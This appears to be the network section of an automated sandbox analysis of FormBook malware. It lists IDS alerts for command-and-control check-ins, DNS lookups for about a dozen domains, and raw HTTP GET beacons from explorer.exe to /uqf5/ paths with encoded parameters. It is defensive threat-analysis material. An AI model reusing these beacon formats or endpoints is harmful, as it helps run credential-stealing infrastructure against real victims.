Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-15:02:33.885599 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.7 | 162.241.253.69
06/11/21-15:02:33.885599 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.7 | 162.241.253.69
06/11/21-15:02:33.885599 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.7 | 162.241.253.69
06/11/21-15:02:39.242866 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.7 | 34.102.136.180
06/11/21-15:02:39.242866 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.7 | 34.102.136.180
06/11/21-15:02:39.242866 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49736 | 80 | 192.168.2.7 | 34.102.136.180
06/11/21-15:02:39.380529 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49736 | 34.102.136.180 | 192.168.2.7
06/11/21-15:02:44.697962 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.7 | 156.241.53.127
06/11/21-15:02:44.697962 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.7 | 156.241.53.127
06/11/21-15:02:44.697962 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.7 | 156.241.53.127
06/11/21-15:02:56.303221 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49739 | 104.21.64.212 | 192.168.2.7
06/11/21-15:03:01.563910 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49746 | 34.102.136.180 | 192.168.2.7
06/11/21-15:03:06.762138 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.7 | 45.140.167.161
06/11/21-15:03:06.762138 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.7 | 45.140.167.161
06/11/21-15:03:06.762138 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.7 | 45.140.167.161
06/11/21-15:03:13.179290 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49753 | 160.16.235.37 | 192.168.2.7
06/11/21-15:03:23.700836 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.7 | 35.246.6.109
06/11/21-15:03:23.700836 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.7 | 35.246.6.109
06/11/21-15:03:23.700836 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49755 | 80 | 192.168.2.7 | 35.246.6.109

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 15:02:23.105751038 CEST | 49724 | 80 | 192.168.2.7 | 213.186.33.5
Jun 11, 2021 15:02:23.164691925 CEST | 80 | 49724 | 213.186.33.5 | 192.168.2.7
Jun 11, 2021 15:02:23.164932013 CEST | 49724 | 80 | 192.168.2.7 | 213.186.33.5
Jun 11, 2021 15:02:23.166137934 CEST | 49724 | 80 | 192.168.2.7 | 213.186.33.5
Jun 11, 2021 15:02:23.234405994 CEST | 80 | 49724 | 213.186.33.5 | 192.168.2.7
Jun 11, 2021 15:02:23.234642029 CEST | 49724 | 80 | 192.168.2.7 | 213.186.33.5
Jun 11, 2021 15:02:23.234913111 CEST | 49724 | 80 | 192.168.2.7 | 213.186.33.5
Jun 11, 2021 15:02:23.292299032 CEST | 80 | 49724 | 213.186.33.5 | 192.168.2.7
Jun 11, 2021 15:02:28.318073988 CEST | 49729 | 80 | 192.168.2.7 | 151.101.0.119
Jun 11, 2021 15:02:28.364393950 CEST | 80 | 49729 | 151.101.0.119 | 192.168.2.7
Jun 11, 2021 15:02:28.365627050 CEST | 49729 | 80 | 192.168.2.7 | 151.101.0.119
Jun 11, 2021 15:02:28.365811110 CEST | 49729 | 80 | 192.168.2.7 | 151.101.0.119
Jun 11, 2021 15:02:28.410748005 CEST | 80 | 49729 | 151.101.0.119 | 192.168.2.7
Jun 11, 2021 15:02:28.514069080 CEST | 80 | 49729 | 151.101.0.119 | 192.168.2.7
Jun 11, 2021 15:02:28.514094114 CEST | 80 | 49729 | 151.101.0.119 | 192.168.2.7
Jun 11, 2021 15:02:28.514415979 CEST | 49729 | 80 | 192.168.2.7 | 151.101.0.119
Jun 11, 2021 15:02:28.514532089 CEST | 49729 | 80 | 192.168.2.7 | 151.101.0.119
Jun 11, 2021 15:02:28.559231997 CEST | 80 | 49729 | 151.101.0.119 | 192.168.2.7
Jun 11, 2021 15:02:33.724452972 CEST | 49730 | 80 | 192.168.2.7 | 162.241.253.69
Jun 11, 2021 15:02:33.885122061 CEST | 80 | 49730 | 162.241.253.69 | 192.168.2.7
Jun 11, 2021 15:02:33.885230064 CEST | 49730 | 80 | 192.168.2.7 | 162.241.253.69
Jun 11, 2021 15:02:33.885598898 CEST | 49730 | 80 | 192.168.2.7 | 162.241.253.69
Jun 11, 2021 15:02:34.056637049 CEST | 80 | 49730 | 162.241.253.69 | 192.168.2.7
Jun 11, 2021 15:02:34.064239025 CEST | 80 | 49730 | 162.241.253.69 | 192.168.2.7
Jun 11, 2021 15:02:34.064285994 CEST | 80 | 49730 | 162.241.253.69 | 192.168.2.7
Jun 11, 2021 15:02:34.064496994 CEST | 49730 | 80 | 192.168.2.7 | 162.241.253.69
Jun 11, 2021 15:02:34.064538002 CEST | 49730 | 80 | 192.168.2.7 | 162.241.253.69
Jun 11, 2021 15:02:34.225109100 CEST | 80 | 49730 | 162.241.253.69 | 192.168.2.7
Jun 11, 2021 15:02:39.197911024 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:02:39.240071058 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:02:39.242655993 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:02:39.242866039 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:02:39.284816027 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:02:39.380528927 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:02:39.380544901 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:02:39.380672932 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:02:39.380791903 CEST | 49736 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:02:39.422661066 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:02:44.466555119 CEST | 49737 | 80 | 192.168.2.7 | 156.241.53.127
Jun 11, 2021 15:02:44.697666883 CEST | 80 | 49737 | 156.241.53.127 | 192.168.2.7
Jun 11, 2021 15:02:44.697839022 CEST | 49737 | 80 | 192.168.2.7 | 156.241.53.127
Jun 11, 2021 15:02:44.697962046 CEST | 49737 | 80 | 192.168.2.7 | 156.241.53.127
Jun 11, 2021 15:02:44.928677082 CEST | 80 | 49737 | 156.241.53.127 | 192.168.2.7
Jun 11, 2021 15:02:45.199877977 CEST | 49737 | 80 | 192.168.2.7 | 156.241.53.127
Jun 11, 2021 15:02:45.469887018 CEST | 80 | 49737 | 156.241.53.127 | 192.168.2.7
Jun 11, 2021 15:02:45.473994017 CEST | 80 | 49737 | 156.241.53.127 | 192.168.2.7
Jun 11, 2021 15:02:45.474014044 CEST | 80 | 49737 | 156.241.53.127 | 192.168.2.7
Jun 11, 2021 15:02:45.474118948 CEST | 49737 | 80 | 192.168.2.7 | 156.241.53.127
Jun 11, 2021 15:02:45.474155903 CEST | 49737 | 80 | 192.168.2.7 | 156.241.53.127
Jun 11, 2021 15:02:50.305583954 CEST | 49738 | 80 | 192.168.2.7 | 184.168.131.241
Jun 11, 2021 15:02:50.500479937 CEST | 80 | 49738 | 184.168.131.241 | 192.168.2.7
Jun 11, 2021 15:02:50.500680923 CEST | 49738 | 80 | 192.168.2.7 | 184.168.131.241
Jun 11, 2021 15:02:50.500833035 CEST | 49738 | 80 | 192.168.2.7 | 184.168.131.241
Jun 11, 2021 15:02:50.695952892 CEST | 80 | 49738 | 184.168.131.241 | 192.168.2.7
Jun 11, 2021 15:02:50.718878031 CEST | 80 | 49738 | 184.168.131.241 | 192.168.2.7
Jun 11, 2021 15:02:50.718913078 CEST | 80 | 49738 | 184.168.131.241 | 192.168.2.7
Jun 11, 2021 15:02:50.719070911 CEST | 49738 | 80 | 192.168.2.7 | 184.168.131.241
Jun 11, 2021 15:02:50.719149113 CEST | 49738 | 80 | 192.168.2.7 | 184.168.131.241
Jun 11, 2021 15:02:50.913141966 CEST | 80 | 49738 | 184.168.131.241 | 192.168.2.7
Jun 11, 2021 15:02:55.855372906 CEST | 49739 | 80 | 192.168.2.7 | 104.21.64.212
Jun 11, 2021 15:02:55.899477959 CEST | 80 | 49739 | 104.21.64.212 | 192.168.2.7
Jun 11, 2021 15:02:55.900799036 CEST | 49739 | 80 | 192.168.2.7 | 104.21.64.212
Jun 11, 2021 15:02:55.901098967 CEST | 49739 | 80 | 192.168.2.7 | 104.21.64.212
Jun 11, 2021 15:02:55.945395947 CEST | 80 | 49739 | 104.21.64.212 | 192.168.2.7
Jun 11, 2021 15:02:56.303220987 CEST | 80 | 49739 | 104.21.64.212 | 192.168.2.7
Jun 11, 2021 15:02:56.303244114 CEST | 80 | 49739 | 104.21.64.212 | 192.168.2.7
Jun 11, 2021 15:02:56.303296089 CEST | 80 | 49739 | 104.21.64.212 | 192.168.2.7
Jun 11, 2021 15:02:56.303396940 CEST | 49739 | 80 | 192.168.2.7 | 104.21.64.212
Jun 11, 2021 15:02:56.303426981 CEST | 49739 | 80 | 192.168.2.7 | 104.21.64.212
Jun 11, 2021 15:02:56.303518057 CEST | 49739 | 80 | 192.168.2.7 | 104.21.64.212
Jun 11, 2021 15:03:01.381918907 CEST | 49746 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:03:01.424647093 CEST | 80 | 49746 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:03:01.424876928 CEST | 49746 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:03:01.424962997 CEST | 49746 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:03:01.466937065 CEST | 80 | 49746 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:03:01.563910007 CEST | 80 | 49746 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:03:01.563935995 CEST | 80 | 49746 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:03:01.564239979 CEST | 49746 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:03:01.564289093 CEST | 49746 | 80 | 192.168.2.7 | 34.102.136.180
Jun 11, 2021 15:03:01.606385946 CEST | 80 | 49746 | 34.102.136.180 | 192.168.2.7
Jun 11, 2021 15:03:06.679408073 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.161
Jun 11, 2021 15:03:06.761852026 CEST | 80 | 49752 | 45.140.167.161 | 192.168.2.7
Jun 11, 2021 15:03:06.761985064 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.161
Jun 11, 2021 15:03:06.762137890 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.161
Jun 11, 2021 15:03:06.846729994 CEST | 80 | 49752 | 45.140.167.161 | 192.168.2.7
Jun 11, 2021 15:03:06.846755028 CEST | 80 | 49752 | 45.140.167.161 | 192.168.2.7
Jun 11, 2021 15:03:06.846764088 CEST | 80 | 49752 | 45.140.167.161 | 192.168.2.7
Jun 11, 2021 15:03:06.846957922 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.161
Jun 11, 2021 15:03:06.847050905 CEST | 49752 | 80 | 192.168.2.7 | 45.140.167.161
Jun 11, 2021 15:03:06.929241896 CEST | 80 | 49752 | 45.140.167.161 | 192.168.2.7
Jun 11, 2021 15:03:12.183099031 CEST | 49753 | 80 | 192.168.2.7 | 160.16.235.37
Jun 11, 2021 15:03:12.500047922 CEST | 80 | 49753 | 160.16.235.37 | 192.168.2.7
Jun 11, 2021 15:03:12.500157118 CEST | 49753 | 80 | 192.168.2.7 | 160.16.235.37
Jun 11, 2021 15:03:12.500335932 CEST | 49753 | 80 | 192.168.2.7 | 160.16.235.37
Jun 11, 2021 15:03:12.824491978 CEST | 80 | 49753 | 160.16.235.37 | 192.168.2.7
Jun 11, 2021 15:03:13.015091896 CEST | 49753 | 80 | 192.168.2.7 | 160.16.235.37
Jun 11, 2021 15:03:13.179290056 CEST | 80 | 49753 | 160.16.235.37 | 192.168.2.7
Jun 11, 2021 15:03:13.179346085 CEST | 80 | 49753 | 160.16.235.37 | 192.168.2.7
Jun 11, 2021 15:03:13.179480076 CEST | 49753 | 80 | 192.168.2.7 | 160.16.235.37
Jun 11, 2021 15:03:13.179522038 CEST | 49753 | 80 | 192.168.2.7 | 160.16.235.37

UDP Packets

                                                                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 15:02:23.026298046 CEST | 192.168.2.7 | 8.8.8.8 | 0x39ea | Standard query (0) | www.prltoday.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:28.253508091 CEST | 192.168.2.7 | 8.8.8.8 | 0x14fe | Standard query (0) | www.gorditasdemaiz.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:33.532628059 CEST | 192.168.2.7 | 8.8.8.8 | 0xdff4 | Standard query (0) | www.mexicobeachselfstorage.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:39.128118038 CEST | 192.168.2.7 | 8.8.8.8 | 0xa3b0 | Standard query (0) | www.tylerrucarean.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:44.393404961 CEST | 192.168.2.7 | 8.8.8.8 | 0x236f | Standard query (0) | www.cgjanvier.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:50.241206884 CEST | 192.168.2.7 | 8.8.8.8 | 0xcfa8 | Standard query (0) | www.flockuplabs.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:55.763794899 CEST | 192.168.2.7 | 8.8.8.8 | 0x1514 | Standard query (0) | www.culturalinterface.net | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:01.314871073 CEST | 192.168.2.7 | 8.8.8.8 | 0x60e8 | Standard query (0) | www.toolbnbapp.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:06.580559015 CEST | 192.168.2.7 | 8.8.8.8 | 0x4898 | Standard query (0) | www.trainup-wall.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:11.884677887 CEST | 192.168.2.7 | 8.8.8.8 | 0xfe17 | Standard query (0) | www.paolograssino.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:18.036056042 CEST | 192.168.2.7 | 8.8.8.8 | 0xbf6c | Standard query (0) | www.a-prime-india-demataccount.zone | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:23.564357996 CEST | 192.168.2.7 | 8.8.8.8 | 0x7819 | Standard query (0) | www.homeanddesignstudio.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:28.908108950 CEST | 192.168.2.7 | 8.8.8.8 | 0xae66 | Standard query (0) | www.stays.travel | A (IP address) | IN (0x0001)

                                                                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 15:02:23.098263025 CEST | 8.8.8.8 | 192.168.2.7 | 0x39ea | No error (0) | www.prltoday.com | | 213.186.33.5 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:24.265928984 CEST | 8.8.8.8 | 192.168.2.7 | 0xf143 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:02:28.314877987 CEST | 8.8.8.8 | 192.168.2.7 | 0x14fe | No error (0) | www.gorditasdemaiz.com | | 151.101.0.119 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:33.722217083 CEST | 8.8.8.8 | 192.168.2.7 | 0xdff4 | No error (0) | www.mexicobeachselfstorage.com | mexicobeachselfstorage.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:02:33.722217083 CEST | 8.8.8.8 | 192.168.2.7 | 0xdff4 | No error (0) | mexicobeachselfstorage.com | | 162.241.253.69 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:39.196547985 CEST | 8.8.8.8 | 192.168.2.7 | 0xa3b0 | No error (0) | www.tylerrucarean.com | tylerrucarean.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:02:39.196547985 CEST | 8.8.8.8 | 192.168.2.7 | 0xa3b0 | No error (0) | tylerrucarean.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:44.465208054 CEST | 8.8.8.8 | 192.168.2.7 | 0x236f | No error (0) | www.cgjanvier.com | | 156.241.53.127 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:50.304538012 CEST | 8.8.8.8 | 192.168.2.7 | 0xcfa8 | No error (0) | www.flockuplabs.com | flockuplabs.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:02:50.304538012 CEST | 8.8.8.8 | 192.168.2.7 | 0xcfa8 | No error (0) | flockuplabs.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:55.854321957 CEST | 8.8.8.8 | 192.168.2.7 | 0x1514 | No error (0) | www.culturalinterface.net | | 104.21.64.212 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:02:55.854321957 CEST | 8.8.8.8 | 192.168.2.7 | 0x1514 | No error (0) | www.culturalinterface.net | | 172.67.187.224 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:01.378590107 CEST | 8.8.8.8 | 192.168.2.7 | 0x60e8 | No error (0) | www.toolbnbapp.com | toolbnbapp.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:03:01.378590107 CEST | 8.8.8.8 | 192.168.2.7 | 0x60e8 | No error (0) | toolbnbapp.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:06.678253889 CEST | 8.8.8.8 | 192.168.2.7 | 0x4898 | No error (0) | www.trainup-wall.com | | 45.140.167.161 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:12.181862116 CEST | 8.8.8.8 | 192.168.2.7 | 0xfe17 | No error (0) | www.paolograssino.com | paolograssino.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:03:12.181862116 CEST | 8.8.8.8 | 192.168.2.7 | 0xfe17 | No error (0) | paolograssino.com | | 160.16.235.37 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:18.101866007 CEST | 8.8.8.8 | 192.168.2.7 | 0xbf6c | No error (0) | www.a-prime-india-demataccount.zone | | 172.67.155.26 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:18.101866007 CEST | 8.8.8.8 | 192.168.2.7 | 0xbf6c | No error (0) | www.a-prime-india-demataccount.zone | | 104.21.42.16 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:23.635313988 CEST | 8.8.8.8 | 192.168.2.7 | 0x7819 | No error (0) | www.homeanddesignstudio.com | www17.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:03:23.635313988 CEST | 8.8.8.8 | 192.168.2.7 | 0x7819 | No error (0) | www17.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:03:23.635313988 CEST | 8.8.8.8 | 192.168.2.7 | 0x7819 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:03:23.635313988 CEST | 8.8.8.8 | 192.168.2.7 | 0x7819 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:03:23.635313988 CEST | 8.8.8.8 | 192.168.2.7 | 0x7819 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:03:29.002484083 CEST | 8.8.8.8 | 192.168.2.7 | 0xae66 | No error (0) | www.stays.travel | | 91.195.240.94 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.prltoday.com
• www.gorditasdemaiz.com
• www.mexicobeachselfstorage.com
• www.tylerrucarean.com
• www.cgjanvier.com
• www.flockuplabs.com
• www.culturalinterface.net
• www.toolbnbapp.com
• www.trainup-wall.com
• www.paolograssino.com
• www.a-prime-india-demataccount.zone

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.749724213.186.33.580C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:23.166137934 CEST1423OUTGET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.prltoday.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:23.234405994 CEST1423INHTTP/1.1 302 Moved Temporarily
                                                                          Server: nginx
                                                                          Date: Fri, 11 Jun 2021 13:02:23 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 138
                                                                          Connection: close
                                                                          Location: http://www.prltoday.com
                                                                          X-IPLB-Instance: 16976
                                                                          Set-Cookie: SERVERID77446=200179|YMNe4|YMNe4; path=/
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.749729151.101.0.11980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:02:28.365811110 CEST1541OUTGET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.gorditasdemaiz.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jun 11, 2021 15:02:28.514069080 CEST1542INHTTP/1.1 301 Moved Permanently
                                                                          server: adobe
                                                                          location: http://gorditasdemaiz.com/uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT
                                                                          cache-control: s-maxage=31536000
                                                                          x-trace-id: sAT0ESH7EmdVgwN4n3lOaOqWFb8
                                                                          x-app-name: Pro2-Renderer
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          Content-Length: 0
                                                                          Accept-Ranges: bytes
                                                                          Date: Fri, 11 Jun 2021 13:02:28 GMT
                                                                          Via: 1.1 varnish
                                                                          Age: 0
                                                                          Connection: close
                                                                          X-Served-By: cache-hhn4022-HHN
                                                                          X-Cache: MISS
                                                                          X-Cache-Hits: 0
                                                                          X-Timer: S1623416548.402593,VS0,VE103
                                                                          Vary: Fastly-SSL, X-Use-Renderer


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          10192.168.2.749754172.67.155.2680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jun 11, 2021 15:03:18.145966053 CEST5520OUTGET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.a-prime-india-demataccount.zone
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:03:18.554022074 CEST | kBytes transferred: 5521 | Direction: IN | Data:
                                                                          HTTP/1.1 404 Not Found
                                                                          Date: Fri, 11 Jun 2021 13:03:18 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0a9cc486a20000c2865d0ba000000001
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UemJ8pwfg8Bz2dxojwItmf4aQ5D7zpo3A2wjaTaS8yOEf8IrxQvson%2B26W8Gpt%2Bzq2shQRo8vwZG24MbZziDzTX3iMVad1ngOnRNfsyDmXAdxjS7GCMkKXNH8HoMU4ybIfBo49jp5Qm0FKvJS4cdyMw%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 65db09ea9a35c286-FRA
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                          Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                          Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.0</center></body></html>


                                                                          Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49730 | Destination IP: 162.241.253.69 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jun 11, 2021 15:02:33.885598898 CEST | kBytes transferred: 1543 | Direction: OUT | Data:
                                                                          GET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1
                                                                          Host: www.mexicobeachselfstorage.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jun 11, 2021 15:02:34.064239025 CEST | kBytes transferred: 1544 | Direction: IN | Data:
                                                                          HTTP/1.1 404 Not Found
                                                                          Date: Fri, 11 Jun 2021 13:02:33 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 